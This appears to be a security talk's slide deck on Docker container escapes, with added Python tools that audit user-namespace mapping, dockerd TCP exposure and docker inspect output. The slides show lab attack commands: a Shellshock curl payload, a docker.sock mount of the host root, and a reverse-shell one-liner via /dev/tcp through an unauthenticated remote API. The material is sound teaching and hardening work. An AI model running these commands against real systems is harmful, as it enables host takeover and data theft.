Demystifying Container Escapes

Vaibhav Gupta
Security Researcher at Adobe
Twitter: @VaibhavGupta_1
It's all about Docker!
§ About Docker – 1 min Primer
§ Cgroups & Namespaces – Quick Demo
§ Docker Attack Surface
1. Exploiting Vulnerable Images
2. The Docker --privileged flag
3. Privilege Escalation Using docker.sock
4. Abusing Docker Remote API
§ Docker is just a way of running processes with limited privileges
§ DEMO: a container process is an ordinary host process
§ docker run -it ubuntu sh
§ ps aux | grep sleep   (on the host: a sleep started inside the container shows up in the host's process list)
§ Cgroups
§ docker run -itd --pids-limit 5 alpine
§ sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10 & sleep 10   (inside the container: the pids cgroup caps the container at 5 processes, the shell included, so further forks fail)
§ Namespaces (e.g. user namespaces)
§ vi /tmp/root-file.txt   (on the host, as root)
§ docker run -itd -v /tmp:/shared alpine
§ Edit the file within the container: it succeeds, because without a user namespace uid 0 in the container is uid 0 on the host
§ Mitigation
§ sudo dockerd --userns-remap=default   (container uid 0 becomes an unprivileged subordinate uid on the host, so the write now fails)
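Why the bind-mount demo succeeds without user namespaces and fails with --userns-remap comes down to the kernel's /proc/<pid>/uid_map translation. The following is an added example, not code from the slides: it re-implements that translation in Python so it runs offline, and assumes a subordinate range starting at uid 100000 (the real value comes from /etc/subuid for the dockremap user).

```python
"""Model what "root inside the container" means on the host with and without
user-namespace remapping. Added example; uid_map contents are constructed and
the remap start (100000) is an assumed /etc/subuid value."""
from typing import List, Optional, Tuple

# Each uid_map line is "<first id inside ns> <first id outside ns> <length>".
UidMap = List[Tuple[int, int, int]]

# Default dockerd: the container shares the host's user namespace, so its
# uid_map is the identity map and container uid 0 *is* host uid 0.
IDENTITY_MAP = "         0          0 4294967295\n"

# dockerd --userns-remap=default: container uids 0..65535 land on the
# dockremap subordinate range (start uid assumed here).
REMAPPED_MAP = "         0     100000      65536\n"


def parse_uid_map(text: str) -> UidMap:
    """Parse /proc/<pid>/uid_map (or gid_map) into (inside, outside, length) triples."""
    entries: UidMap = []
    for line in text.splitlines():
        if not line.strip():
            continue
        inside, outside, length = (int(x) for x in line.split())
        if length <= 0:
            raise ValueError("uid_map length must be positive")
        entries.append((inside, outside, length))
    return entries


def to_host_uid(container_uid: int, uid_map: UidMap) -> Optional[int]:
    """Translate a uid as seen inside the namespace to the host (outside) uid.

    Returns None when no mapping covers the uid; such ids are unusable inside
    the namespace (the kernel rejects them, e.g. chown fails with EINVAL).
    """
    for inside, outside, length in uid_map:
        if inside <= container_uid < inside + length:
            return outside + (container_uid - inside)
    return None


def can_write(host_uid: int, owner_uid: int, mode: int) -> bool:
    """Simplified DAC check on a host file reached through a bind mount.

    Only owner/other bits are considered (group membership is ignored) and
    host uid 0 is treated as real root, which bypasses DAC on the host.
    """
    if host_uid == 0:
        return True
    if host_uid == owner_uid:
        return bool(mode & 0o200)
    return bool(mode & 0o002)


def root_file_writable(uid_map_text: str) -> bool:
    """Can uid 0 inside the container modify /tmp/root-file.txt (host root, 0644)?"""
    host_uid = to_host_uid(0, parse_uid_map(uid_map_text))
    return host_uid is not None and can_write(host_uid, owner_uid=0, mode=0o644)


if __name__ == "__main__":
    for name, text in (("no userns", IDENTITY_MAP), ("userns-remap", REMAPPED_MAP)):
        hid = to_host_uid(0, parse_uid_map(text))
        print(f"{name:13s}: container uid 0 -> host uid {hid}, "
              f"can edit host root file: {root_file_writable(text)}")
```

To check a live container, read /proc/<container pid>/uid_map from the host and feed it to parse_uid_map; an identity map means the container's root is the host's root for every bind mount it can reach. Remapping also scopes the container's capabilities to its own user namespace, so container root has no CAP_DAC_OVERRIDE on host files either.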
DOCKER ATTACK SURFACE
• Vulnerable Images
• Container running with unintended privileges
• Docker Daemon Misconfigurations
• Unauthenticated Docker Remote API
• Misconfigured or Vulnerable Hosts
• Insecure Registry
• Backdoored Images
• ??
EXPLOITING VULNERABLE IMAGES
§ Sample Vulnerable App (Shellshock, CVE-2014-6271, reachable through a CGI script)
§ docker run --rm -it -p 8080:80 vulnerables/cve-2014-6271
§ Exploitation
§ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://vulnerable-server:8080/cgi-bin/vulnerable
§ This gives code execution inside the container only; the escape needs one of the misconfigurations that follow
§ Some containers require /var/run/docker.sock to be mounted inside them
§ It is needed when the container has to talk to the Docker daemon on the host
§ For e.g. – a ‘Dockerized’ host monitoring application
ü docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
ü docker exec -it <id> sh
ü apk update
ü apk add -U docker
ü docker -H unix:///var/run/docker.sock run -it -v /:/test:ro alpine sh   (from inside the container: the daemon behind the socket runs as root on the host, so whoever holds the socket can start a container with any host path mounted)
§ Allows interaction with a remote Docker daemon over TCP
§ No authentication by default: a plain tcp:// listener accepts any client
§ Let's gain a shell!
ü sudo apt install jq
ü sudo vi /lib/systemd/system/docker.service   (lab setup: expose the daemon on plain TCP, no TLS)
ü ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
ü sudo systemctl daemon-reload
ü sudo service docker restart
ü curl http://localhost:2375/containers/json | jq   (enumerate containers, no credentials needed)
ü docker -H tcp://localhost:2375 run --rm -v /:/mnt ubuntu chroot /mnt /bin/bash -c "bash -i >& /dev/tcp/172.17.0.1/8080 0>&1"   (reverse shell from a chroot of the host's root filesystem; 172.17.0.1 is the docker0 address, where a listener on port 8080 is assumed to be waiting)
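The ExecStart line above is the weak setting; the fix is to keep the TCP listener behind mutual TLS (--tlsverify with a CA, server cert and key) or not expose it at all. The following is an added example, not code from the slides: it audits the two places the listen addresses live, the systemd ExecStart= line and /etc/docker/daemon.json, and flags tcp:// listeners without --tlsverify. The inputs are constructed; the hardened line assumes certificate paths under /etc/docker.

```python
"""Audit how dockerd is exposed on the network. Added example, not from the
slides; ExecStart/daemon.json samples are constructed and the certificate
paths in the hardened line are assumed."""
import json
import shlex
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# The slide's own lab setting: API on every interface, no TLS, no client auth.
WEAK_EXEC_START = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"

# Corrected form: clients must present a certificate signed by the CA.
HARDENED_EXEC_START = (
    "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2376 --tlsverify "
    "--tlscacert=/etc/docker/ca.pem --tlscert=/etc/docker/server-cert.pem "
    "--tlskey=/etc/docker/server-key.pem"
)

# The same weakness expressed in daemon.json instead of the unit file.
WEAK_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'


def dockerd_argv(exec_start: str) -> List[str]:
    """Turn a systemd ExecStart= line into an argv list."""
    value = exec_start.split("=", 1)[1] if exec_start.startswith("ExecStart=") else exec_start
    return shlex.split(value)


def listen_hosts(argv: List[str], daemon_conf: Dict) -> List[str]:
    """Every -H/--host value plus the daemon.json "hosts" array.

    Note: dockerd refuses to start when "hosts" is set in both places, so the
    fix has to be applied in whichever one is actually in use.
    """
    hosts: List[str] = []
    for i, arg in enumerate(argv):
        if arg in ("-H", "--host") and i + 1 < len(argv):
            hosts.append(argv[i + 1])
        elif arg.startswith("--host=") or arg.startswith("-H="):
            hosts.append(arg.split("=", 1)[1])
    hosts.extend(daemon_conf.get("hosts", []))
    return hosts


def tls_verify_enabled(argv: List[str], daemon_conf: Dict) -> bool:
    """--tlsverify (flag or daemon.json key) enforces client certificates.
    --tls alone only encrypts the connection and still admits any client."""
    if daemon_conf.get("tlsverify") is True:
        return True
    return any(a in ("--tlsverify", "--tlsverify=true") for a in argv)


def audit_dockerd(exec_start: str, daemon_json: Optional[str] = None) -> List[str]:
    """Findings for the daemon's listen configuration; empty means no
    unauthenticated TCP exposure was found."""
    argv = dockerd_argv(exec_start)
    conf = json.loads(daemon_json) if daemon_json else {}
    verified = tls_verify_enabled(argv, conf)
    findings: List[str] = []
    for host in listen_hosts(argv, conf):
        if not host.startswith("tcp://"):
            continue  # fd:// and unix:// are gated by socket file permissions
        if verified:
            continue
        u = urlsplit(host)
        bind = u.hostname or "localhost"       # dockerd's default for a bare tcp://
        port = u.port or 2375                  # plain-text default port
        scope = "every interface" if bind in ("0.0.0.0", "::") else bind
        findings.append(
            f"tcp://{bind}:{port} without --tlsverify (reachable on {scope}): "
            "the API is root on the host for anyone who can connect"
        )
    return findings


if __name__ == "__main__":
    print("weak unit file :", audit_dockerd(WEAK_EXEC_START))
    print("weak daemon.json:", audit_dockerd("ExecStart=/usr/bin/dockerd -H fd://", WEAK_DAEMON_JSON))
    print("hardened       :", audit_dockerd(HARDENED_EXEC_START))
```

On a real host, feed it the ExecStart= line from `systemctl cat docker` and the contents of /etc/docker/daemon.json. A passing result still leaves the unix socket, whose permissions decide who on the host is effectively root, which is the next slide's point.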
§ docker run -itd alpine   (default capability set, for comparison)
§ docker run --rm -it --cap-drop=NET_RAW alpine sh
§ ping 127.0.0.1 -c 2   (ping opens a raw socket, so it fails once NET_RAW is dropped)
§ Printing capabilities: capsh --print
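The docker.sock slide, the --privileged flag from the agenda and the capability demo above are all things `docker inspect` reveals after the fact. The following is an added example, not code from the slides: it audits a `docker inspect` document for a mounted docker.sock, --privileged, sensitive host paths bind-mounted in, host PID/network namespaces and added capabilities. SAMPLE_INSPECT is constructed test data shaped like the real output for the containers started on these slides, with placeholder ids.

```python
"""Audit `docker inspect` output for the privilege problems shown on the slides.
Added example, not part of the original deck; SAMPLE_INSPECT is constructed."""
import json
import posixpath
from typing import Any, Dict, List

# Host paths whose exposure hands over host state or kernel interfaces.
# A starting list, not an exhaustive one.
SENSITIVE_HOST_PATHS = {"/", "/etc", "/root", "/proc", "/sys", "/dev", "/var/lib/docker"}

# Capabilities outside Docker's default set that are commonly enough for an
# escape or for tampering with the host. Also a starting list.
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "SYS_RAWIO",
                  "DAC_READ_SEARCH", "NET_ADMIN", "SYS_BOOT"}


def audit_container(c: Dict[str, Any]) -> List[str]:
    """Return findings for one element of a `docker inspect` array."""
    findings: List[str] = []
    hc = c.get("HostConfig", {})

    if hc.get("Privileged"):
        findings.append("privileged: all capabilities, every host device, no seccomp/AppArmor")

    for m in c.get("Mounts", []):
        if m.get("Type") != "bind":
            continue
        src = posixpath.normpath(m.get("Source", ""))
        dst = m.get("Destination", "")
        mode = "rw" if m.get("RW", True) else "ro"
        if posixpath.basename(src) == "docker.sock":
            # A read-only bind mount still allows connect() on the socket,
            # so ":ro" is not a mitigation here; flag it regardless of mode.
            findings.append(f"docker.sock: {src} mounted at {dst} ({mode}); "
                            "the API can start a container with host / mounted")
        elif src in SENSITIVE_HOST_PATHS:
            findings.append(f"host-path: {src} mounted at {dst} ({mode})")

    if hc.get("PidMode") == "host":
        findings.append("ns: host PID namespace (host processes visible, ptrace-able with SYS_PTRACE)")
    if hc.get("NetworkMode") == "host":
        findings.append("ns: host network namespace (host interfaces and sockets exposed)")

    for cap in hc.get("CapAdd") or []:
        name = cap.upper()
        if name.startswith("CAP_"):
            name = name[4:]
        if name in DANGEROUS_CAPS:
            findings.append(f"cap: {name} added")
    return findings


def audit_inspect(inspect_json: str) -> Dict[str, List[str]]:
    """Map container name -> findings for a whole `docker inspect` document."""
    return {c["Name"]: audit_container(c) for c in json.loads(inspect_json)}


# Constructed sample: the containers from the slides, trimmed to the fields
# read above. Ids are placeholders.
SAMPLE_INSPECT = json.dumps([
    {   # docker run -itd -v /var/run/docker.sock:/var/run/docker.sock alpine
        "Id": "0000000000000001", "Name": "/monitoring",
        "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"],
                       "Privileged": False, "CapAdd": None, "CapDrop": None,
                       "PidMode": "", "NetworkMode": "default"},
        "Mounts": [{"Type": "bind", "Source": "/var/run/docker.sock",
                    "Destination": "/var/run/docker.sock", "RW": True}],
    },
    {   # docker run -it -v /:/test:ro alpine sh
        "Id": "0000000000000002", "Name": "/hostfs",
        "HostConfig": {"Binds": ["/:/test:ro"], "Privileged": False,
                       "CapAdd": None, "CapDrop": None,
                       "PidMode": "", "NetworkMode": "default"},
        "Mounts": [{"Type": "bind", "Source": "/", "Destination": "/test", "RW": False}],
    },
    {   # docker run --rm -it --cap-drop=NET_RAW alpine sh
        "Id": "0000000000000003", "Name": "/hardened",
        "HostConfig": {"Binds": None, "Privileged": False,
                       "CapAdd": None, "CapDrop": ["NET_RAW"],
                       "PidMode": "", "NetworkMode": "default"},
        "Mounts": [],
    },
])

if __name__ == "__main__":
    for name, findings in audit_inspect(SAMPLE_INSPECT).items():
        print(name, "->", findings or ["no findings"])
```

Run it against `docker inspect $(docker ps -q)` to sweep every running container. The socket check deliberately ignores the RW flag: a read-only bind mount only restricts filesystem operations on the socket inode, and connecting to it is what matters.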
§ https://docs.docker.com/engine/security/security/
§ https://docs.docker.com/engine/security/userns-remap/
§ https://securityboulevard.com/2019/02/abusing-docker-api-socket/
§ Email:Vaibhav.Gupta @ owasp.org
§ Twitter: @VaibhavGupta_1
§ Blog: https://exploits.work